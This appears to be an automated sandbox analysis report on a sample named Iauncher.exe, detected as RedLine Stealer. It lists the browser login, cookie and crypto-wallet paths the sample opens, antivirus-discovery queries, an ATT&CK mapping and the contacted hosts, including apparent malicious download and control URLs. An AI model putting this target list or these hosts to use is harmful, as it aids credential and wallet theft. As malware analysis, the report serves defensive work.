Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

Code function: 2_2_00F16C92 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_00F16C92

Source: C:\Users\user\Desktop\Iauncher.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 2.2.Iauncher.exe.f40030.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Iauncher.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Iauncher.exe.f40030.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1978480941.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Iauncher.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7452, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7452, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 2.2.Iauncher.exe.f40030.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Iauncher.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Iauncher.exe.f40030.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1978480941.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Iauncher.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7452, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	311 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	134 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Install Root Certificate	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	13 Software Packing	LSA Secrets	241 Security Software Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	241 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	241 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Iauncher.exe	24%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
Iauncher.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://ns.adp/1.0/g	0%	Avira URL Cloud	safe
https://gitgo.org/Iauncher.zipd	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id12Response	0%	Avira URL Cloud	safe
https://gitgo.org	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id23ResponseD	0%	Avira URL Cloud	safe
https://www.siticoneframework.com/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id21Response	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id15Response	0%	Avira URL Cloud	safe
http://gitgo.org	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id1ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5Response	0%	Avira URL Cloud	safe
http://tempuri.org/D	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id8Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id10Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id3ResponseD	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id13Response	0%	Avira URL Cloud	safe
https://www.siticoneframework.com/pricing.htmlFSoftware	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id22Response	0%	Avira URL Cloud	safe
http://antiloxss.usite.prod	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id18Response	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
antiloxss.usite.pro	193.109.246.100	true	false	high
google.com	142.251.163.113	true	false	high
gitgo.org	104.21.44.179	true	false	unknown

Contacted URLs

Name	Malicious	Reputation
https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt	false	high
https://antiloxss.usite.pro/STLprograms/NEW/hwid.txt	false	high
https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt	false	high
https://antiloxss.usite.pro/STLprograms/NEW/z-Closing.txt	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gitgo.org/Iauncher.zipd	Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id23ResponseD	RegAsm.exe, 00000004.00000002.1979402537.000000000284F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id12Response	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gitgo.org	Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id2Response	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.siticoneframework.com/	Iauncher.exe, 00000000.00000002.3509420380.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ns.adp/1.0/g	RegAsm.exe, 00000004.00000002.1979253603.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15Response	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn	Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txtt-	Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://gitgo.org	Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/hwids.txtd	Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	Iauncher.exe, Iauncher.exe, 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1978480941.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id1ResponseD	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id5Response	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id3ResponseD	RegAsm.exe, 00000004.00000002.1979402537.000000000284F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	false		high
